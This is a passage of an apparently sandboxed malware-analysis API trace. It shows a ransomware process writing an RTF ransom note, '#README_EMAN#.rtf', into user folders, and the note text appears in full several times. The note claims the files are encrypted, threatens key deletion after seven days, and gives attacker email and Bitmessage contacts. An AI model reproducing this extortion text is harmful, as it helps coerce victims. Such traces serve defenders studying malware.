m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.818] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.819] CloseHandle (hObject=0x27c) returned 1 [0298.819] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\#readme_eman#.rtf")) returned 0xffffffff [0298.819] GetLastError () returned 0x2 [0298.819] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.820] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.820] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 